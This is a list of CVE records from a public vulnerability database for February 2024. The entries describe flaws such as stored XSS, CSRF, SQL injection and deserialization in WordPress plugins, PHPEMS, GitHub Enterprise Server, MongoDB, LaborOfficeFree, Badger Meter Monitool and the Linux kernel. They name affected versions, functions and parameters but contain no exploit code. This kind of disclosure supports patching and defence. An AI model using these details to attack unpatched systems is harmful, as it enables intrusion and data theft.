CVE 2024 1354 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via the `syslog-ng` configuration file. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10 Assigned (20240208)
CVE 2024 1353 Candidate A vulnerability, which was classified as critical, has been found in PHPEMS up to 1.0. Affected by this issue is the function index of the file app/weixin/controller/index.api.php. The manipulation of the argument picurl leads to deserialization. The exploit has been disclosed to the public and may be used. VDB-253226 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/nxGzfEB6fFVY | URL:https://note.zhaoj.in/share/nxGzfEB6fFVY | MISC:https://vuldb.com/?ctiid.253226 | URL:https://vuldb.com/?ctiid.253226 | MISC:https://vuldb.com/?id.253226 | URL:https://vuldb.com/?id.253226 Assigned (20240208)
CVE 2024 1351 Candidate Under certain configurations of --tlsCAFile and tls.CAFile, MongoDB Server may skip peer certificate validation which may result in untrusted connections to succeed. This may effectively reduce the security guarantees provided by TLS and open connections that should have been closed due to failing certificate validation. This issue affects MongoDB Server v7.0 versions prior to and including 7.0.5, MongoDB Server v6.0 versions prior to and including 6.0.13, MongoDB Server v5.0 versions prior to and including 5.0.24 and MongoDB Server v4.4 versions prior to and including 4.4.28. Required Configuration : A server process will allow incoming connections to skip peer certificate validation if the server process was started with TLS enabled (net.tls.mode set to allowTLS, preferTLS, or requireTLS) and without a net.tls.CAFile configured. MISC:https://jira.mongodb.org/browse/SERVER-72839 | URL:https://jira.mongodb.org/browse/SERVER-72839 | MISC:https://www.mongodb.com/docs/manual/release-notes/4.4/#4.4.29---february-28--2024 | URL:https://www.mongodb.com/docs/manual/release-notes/4.4/#4.4.29---february-28--2024 | MISC:https://www.mongodb.com/docs/manual/release-notes/7.0/#7.0.6---feb-28--2024 | URL:https://www.mongodb.com/docs/manual/release-notes/7.0/#7.0.6---feb-28--2024 | MISC:https://www.mongodb.com/docs/v5.0/release-notes/5.0/#5.0.25---february-28--2024 | URL:https://www.mongodb.com/docs/v5.0/release-notes/5.0/#5.0.25---february-28--2024 | MISC:https://www.mongodb.com/docs/v6.0/release-notes/6.0/#6.0.14---feb-28--2024 | URL:https://www.mongodb.com/docs/v6.0/release-notes/6.0/#6.0.14---feb-28--2024 Assigned (20240208)
CVE 2024 1349 Candidate The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.9.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Shortcode.php | URL:https://plugins.trac.wordpress.org/browser/embedpress/tags/3.9.8/EmbedPress/Shortcode.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035539%40embedpress%2Ftrunk&old=3029957%40embedpress%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/631d200f-7b0b-4105-b91e-030af459ba99?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/631d200f-7b0b-4105-b91e-030af459ba99?source=cve Assigned (20240208)
CVE 2024 1346 Candidate Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree Assigned (20240208)
CVE 2024 1345 Candidate Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to perform a brute force attack and easily discover the root password. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree Assigned (20240208)
CVE 2024 1344 Candidate Encrypted database credentials in LaborOfficeFree affecting version 19.10. This vulnerability allows an attacker to read and extract the username and password from the database of 'LOF_service.exe' and 'LaborOfficeFree.exe' located in the '%programfiles(x86)%\LaborOfficeFree\' directory. This user can log in remotely and has root-like privileges. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree Assigned (20240208)
CVE 2024 1343 Candidate A weak permission was found in the backup directory in LaborOfficeFree affecting version 19.10. This vulnerability allows any authenticated user to read backup files in the directory '%programfiles(x86)% LaborOfficeFree BackUp'. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-laborofficefree Assigned (20240208)
CVE 2024 1342 Candidate A flaw was found in OpenShift. The existing Cross-Site Request Forgery (CSRF) protections in place do not properly protect GET requests, allowing for the creation of WebSockets via CSRF. MISC:RHBZ#2259960 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259960 | MISC:https://access.redhat.com/security/cve/CVE-2024-1342 | URL:https://access.redhat.com/security/cve/CVE-2024-1342 Assigned (20240207)
CVE 2024 1341 Candidate The Advanced iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's advanced_iframe shortcode in all versions up to, and including, 2024.1 due to the plugin allowing users to include JS files from external sources through the additional_js attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042304%40advanced-iframe&new=3042304%40advanced-iframe&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/699e5c80-8a11-4f67-8b17-41170d9c6411?source=cve Assigned (20240207)
CVE 2024 1340 Candidate The Login Lockdown – Protect Login Form plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the generate_export_file function in all versions up to, and including, 2.08. This makes it possible for authenticated attackers, with subscriber access and higher, to export this plugin's settings that include whitelisted IP addresses as well as a global unlock key. With the global unlock key an attacker can add their IP address to the whitelist. MISC:https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php#L492 | URL:https://plugins.trac.wordpress.org/browser/login-lockdown/trunk/libs/functions.php#L492 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033542%40login-lockdown%2Ftrunk&old=3027788%40login-lockdown%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/34021007-b5d3-479b-a0d4-50e301f22c9c?source=cve Assigned (20240207)
CVE 2024 1339 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the reinitialize function. This makes it possible for unauthenticated attackers to remove all plugin data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2d08e462-8297-477e-89da-47f26bd6beae?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2d08e462-8297-477e-89da-47f26bd6beae?source=cve Assigned (20240207)
CVE 2024 1338 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the stopOptimizeAll function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3dd131-dbd8-431c-96f4-4ab2c3be4dbd?source=cve Assigned (20240207)
CVE 2024 1337 Candidate The SKT Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveSktbuilderPageData' function in all versions up to, and including, 4.1. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary content into pages. MISC:https://plugins.trac.wordpress.org/changeset/3034383/ | URL:https://plugins.trac.wordpress.org/changeset/3034383/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3164b96f-d876-4cbc-bddf-51e9d9becee6?source=cve Assigned (20240207)
CVE 2024 1336 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the optimizeAllOn function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve Assigned (20240207)
CVE 2024 1335 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the disableOptimization function. This makes it possible for unauthenticated attackers to disable the image optimization setting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve Assigned (20240207)
CVE 2024 1334 Candidate The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the enableOptimization function. This makes it possible for unauthenticated attackers to enable image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | URL:https://plugins.trac.wordpress.org/changeset/3031424/imagerecycle-pdf-image-compression | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0318ec4a-185a-405d-90f8-008ba373114b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0318ec4a-185a-405d-90f8-008ba373114b?source=cve Assigned (20240207)
CVE 2024 1333 Candidate The Responsive Pricing Table WordPress plugin before 5.1.11 does not validate and escape some of its Pricing Table options before outputting them back in a page/post where the related shortcode is embed, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks MISC:https://wpscan.com/vulnerability/30546402-03b8-4e18-ad7e-04a6b556ffd7/ | URL:https://wpscan.com/vulnerability/30546402-03b8-4e18-ad7e-04a6b556ffd7/ Assigned (20240207)
CVE 2024 1331 Candidate The Team Members WordPress plugin before 5.3.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks. MISC:https://wpscan.com/vulnerability/b2bac900-3d8f-406c-b03d-c8db156acc59/ | URL:https://wpscan.com/vulnerability/b2bac900-3d8f-406c-b03d-c8db156acc59/ Assigned (20240207)
CVE 2024 1329 Candidate HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3 template renderer is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. Fixed in Nomad 1.7.4, 1.6.7, 1.5.14. MISC:https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack | URL:https://discuss.hashicorp.com/t/hcsec-2024-03-nomad-vulnerable-to-arbitrary-write-through-symlink-attack Assigned (20240207)
CVE 2024 1328 Candidate The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘style’ parameter in all versions up to, and including, 4.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/newsletter2go/tags/4.0.13/gui/N2Go_Gui.php#L296 | URL:https://plugins.trac.wordpress.org/browser/newsletter2go/tags/4.0.13/gui/N2Go_Gui.php#L296 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/766ac399-7280-4186-8972-94da813da85e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/766ac399-7280-4186-8972-94da813da85e?source=cve Assigned (20240207)
CVE 2024 1326 Candidate The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML Tag attributes in all versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/trunk/class/elements/views/class-post-block-view.php#L375 | URL:https://plugins.trac.wordpress.org/browser/jeg-elementor-kit/trunk/class/elements/views/class-post-block-view.php#L375 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve Assigned (20240207)
CVE 2024 1325 Candidate The Live Sales Notification for Woocommerce – Woomotiv plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.3. This is due to missing or incorrect nonce validation on the 'ajax_cancel_review' function. This makes it possible for unauthenticated attackers to reset the site's review count via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/woomotiv/tags/3.4.1/lib/class-backend.php#L495 | URL:https://plugins.trac.wordpress.org/browser/woomotiv/tags/3.4.1/lib/class-backend.php#L495 | MISC:https://wordpress.org/plugins/woomotiv/ | URL:https://wordpress.org/plugins/woomotiv/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1c1b43-def2-4f9f-b5c7-075ca188f6e7?source=cve Assigned (20240207)
CVE 2024 1323 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Type Grid Widget Title in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3040304/themeisle-companion/tags/2.10.32/vendor/codeinwp/elementor-extra-widgets/class-elementor-extra-widgets.php | URL:https://plugins.trac.wordpress.org/changeset/3040304/themeisle-companion/tags/2.10.32/vendor/codeinwp/elementor-extra-widgets/class-elementor-extra-widgets.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038451%40themeisle-companion&new=3038451%40themeisle-companion&sfp_email=&sfph_mail= | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040304%40themeisle-companion&new=3040304%40themeisle-companion&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0241a9fc-ce42-4a97-9f33-f07cf53c0f52?source=cve Assigned (20240207)
CVE 2024 1322 Candidate The Directorist – WordPress Business Directory Plugin with Classified Ads Listings plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'setup_wizard' function in all versions up to, and including, 7.8.4. This makes it possible for unauthenticated attackers to recreate default pages and enable or disable monetization and change map provider. MISC:https://plugins.trac.wordpress.org/browser/directorist/tags/7.8.4/includes/classes/class-setup-wizard.php#L300 | URL:https://plugins.trac.wordpress.org/browser/directorist/tags/7.8.4/includes/classes/class-setup-wizard.php#L300 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fdirectorist%2Ftags%2F7.8.4&old=3034765&new_path=%2Fdirectorist%2Ftags%2F7.8.5&new=3034765&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa26e958-4850-451b-88eb-d48fc0c7feb7?source=cve Assigned (20240207)
CVE 2024 1321 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2. This is due to the plugin allowing unauthenticated users to update the status of order payments. This makes it possible for unauthenticated attackers to book events for free. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve Assigned (20240207)
CVE 2024 1320 Candidate The EventPrime – Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'offline_status' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve Assigned (20240207)
CVE 2024 1319 Candidate The Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the attendees list on any post type regardless of status. (e.g. draft, private, pending review, password-protected, and trashed posts). MISC:https://wpscan.com/vulnerability/5904dc7e-1058-4c40-bca3-66ba57b1414b/ | URL:https://wpscan.com/vulnerability/5904dc7e-1058-4c40-bca3-66ba57b1414b/ Assigned (20240207)
CVE 2024 1318 Candidate The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'feedzy_wizard_step_process' and 'import_status' functions in all versions up to, and including, 4.4.2. This makes it possible for authenticated attackers, with Contributor access and above, who are normally restricted to only being able to create posts rather than pages, to draft and publish posts with arbitrary content. MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-admin.php#L1053 | URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-admin.php#L1053 | MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L1022 | URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L1022 | MISC:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php | URL:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/181edcec-a57d-4516-935d-6777d2de77ae?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/181edcec-a57d-4516-935d-6777d2de77ae?source=cve Assigned (20240207)
CVE 2024 1317 Candidate The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to SQL Injection via the ‘search_key’ parameter in all versions up to, and including, 4.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L2623 | URL:https://plugins.trac.wordpress.org/browser/feedzy-rss-feeds/tags/4.4.2/includes/admin/feedzy-rss-feeds-import.php#L2623 | MISC:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php | URL:https://plugins.trac.wordpress.org/changeset/3033749/feedzy-rss-feeds/tags/4.4.3/includes/admin/feedzy-rss-feeds-admin.php?old=3030538&old_path=feedzy-rss-feeds%2Ftags%2F4.4.2%2Fincludes%2Fadmin%2Ffeedzy-rss-feeds-admin.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cf57aeaa-e37e-4b22-aeaa-f0a9f4877484?source=cve Assigned (20240207)
CVE 2024 1316 Candidate The Event Tickets and Registration WordPress plugin before 5.8.1, Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the existence of certain events they shouldn't have access to. (e.g. draft, private, pending review, pw-protected, and trashed events). MISC:https://wpscan.com/vulnerability/d80dfe2f-207d-4cdf-8c71-27936c6318e5/ | URL:https://wpscan.com/vulnerability/d80dfe2f-207d-4cdf-8c71-27936c6318e5/ Assigned (20240207)
CVE 2024 1312 Candidate A use-after-free flaw was found in the Linux kernel's Memory Management subsystem when a user wins two races at the same time with a fail in the mas_prev_slot function. This issue could allow a local user to crash the system. MISC:RHBZ#2225569 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2225569 | MISC:https://access.redhat.com/security/cve/CVE-2024-1312 | URL:https://access.redhat.com/security/cve/CVE-2024-1312 | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306 | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/mm/memory.c?h=v6.8-rc3&id=657b5146955eba331e01b9a6ae89ce2e716ba306 Assigned (20240207)
CVE 2024 1311 Candidate The Brizy – Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the storeImages function in all versions up to, and including, 2.4.40. This makes it possible for authenticated attackers, with contributor access or above, to upload arbitrary files on the affected site's server which may make remote code execution possible. MISC:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L254 | URL:https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/zip/archiver.php#L254 | MISC:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/zip/archiver.php | URL:https://plugins.trac.wordpress.org/changeset/3034945/brizy/tags/2.4.41/editor/zip/archiver.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/dc023c1b-7ec6-45b6-b50a-f0d823065843?source=cve Assigned (20240207)
CVE 2024 1309 Candidate Uncontrolled Resource Consumption vulnerability in Honeywell Niagara Framework on Windows, Linux, QNX allows Content Spoofing.This issue affects Niagara Framework: before Niagara AX 3.8.1, before Niagara 4.1. CERT-VN:VU#417980 | URL:https://www.kb.cert.org/vuls/id/417980 | MISC:https://process.honeywell.com | URL:https://process.honeywell.com | MISC:https://www.honeywell.com/us/en/product-security | URL:https://www.honeywell.com/us/en/product-security Assigned (20240207)
CVE 2024 1304 Candidate Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool Assigned (20240207)
CVE 2024 1303 Candidate Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool Assigned (20240207)
CVE 2024 1302 Candidate Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-badger-meters-monitool Assigned (20240207)
